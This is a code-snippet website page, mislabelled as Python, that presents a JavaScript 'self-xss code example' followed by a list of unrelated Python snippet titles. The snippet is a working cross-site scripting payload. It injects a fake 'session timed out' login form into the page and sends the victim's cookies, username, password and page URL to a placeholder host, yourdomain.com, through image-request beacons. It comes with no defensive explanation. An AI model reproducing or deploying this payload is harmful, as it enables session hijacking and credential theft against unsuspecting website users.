Search
 
SCRIPT & CODE EXAMPLE
 

PYTHON

self-xss code example

var done = false;
var stolen = false;
 
function makeit(){
    setTimeout(function(){
        var myElem = document.getElementById("loginmodal");
        if (myElem === null){
            document.body.innerHTML += '<a style="display:none" >Modal Login</a><div id="loginmodal" style="display:none;"><h1>User Login</h1>' +
                                       '<form id="loginform" name="loginform" method="post"><h2 style="color:red">Your session has timed out, ' +
                                       'please re-enter your credentials</h2><label for="username">Username:</label><input type="text" ' +
                                       'name="username" id="username" class="txtfield" tabindex="1"><label for="password">Password:</label>' +
                                       '<input type="password" name="password" id="password" class="txtfield" tabindex="2"><div class="center">' +
                                       '<input type="submit" name="loginbtn" id="loginbtn" class="flatbtn-blu hidemodal" value="Log In" tabindex="3">' +
                                       '</div></form></div>';
            XSSImage = new Image;
            XSSImage.src="https://yourdomain.com/log?checkin=true&cookies=" + encodeURIComponent(document.cookie) + "&url=" + window.location.href;
        }
    }, 2000);
}

makeit();
 
function defer_again(method) {
    var myElem = document.getElementById("loginmodal");
    if (myElem === null)
        setTimeout(function() { defer_again(method) }, 50);
    else{
        method();
    }
}
 
defer_again(
    function trig(){
        var uname = document.getElementById('username').value;
        var pwd = document.getElementById('password').value;
        if (uname.length > 4 && pwd.length > 4)
        {
            done = true;
            //alert("Had this been a real attack... Your credentials were just stolen. User Name = " + uname + "  Password = " + pwd);
            XSSImage = new Image;
            XSSImage.src="https://yourdomain.com/log?username=" + encodeURIComponent(uname) + "&password=" + encodeURIComponent(pwd) + 
                         "&url=" + window.location.href;
            stolen = true;
            return false;
        }

        if(!stolen){
            document.getElementById('username').focus();
            setTimeout(function() { trig() }, 50);
        }
    }
);
Comment

self-xss meaning

SCARYYY
Comment
PREVIOUS NEXT
Code Example
Python :: python program for swapping position of two numbers 
Python :: pandas divide one column by another 
Python :: replace multiple values in pandas column 
Python :: how to do disconnect command on member in discord python 
Python :: batchnormalization keras 
Python :: how to check if an object of a certain type python 
Python :: change the frequency to column in pandas 
Python :: how to use turtle in python in python 3.9 
Python :: beautiful soup get class name 
Python :: django admin.py all fields 
Python :: check integer number python 
Python :: list comprehension if 
Python :: pandas series to tuple list 
Python :: data series to datetime 
Python :: search dictionary for value 
Python :: how to convert a set to a list in python 
Python :: python efficiently find duplicates in list 
Python :: python find in list 
Python :: ad background image with tkinter 
Python :: loop through list of dictionaries python 
Python :: Python program to draw star 
Python :: check all values in dictionary python 
Python :: django filter by date range 
Python :: pandas add quantile columns 
Python :: python how to remove commas from string 
Python :: how to do swapping in python without 
Python :: replace column values/create new column based on another column values/condition in Pandas 
Python :: how to convert the date column from string to a particular format in python 
Python :: how to merge two dictionaries in python 
Python :: append dataframe pandas 
ADD CONTENT
Topic
Content
Source link
Name
4+8 =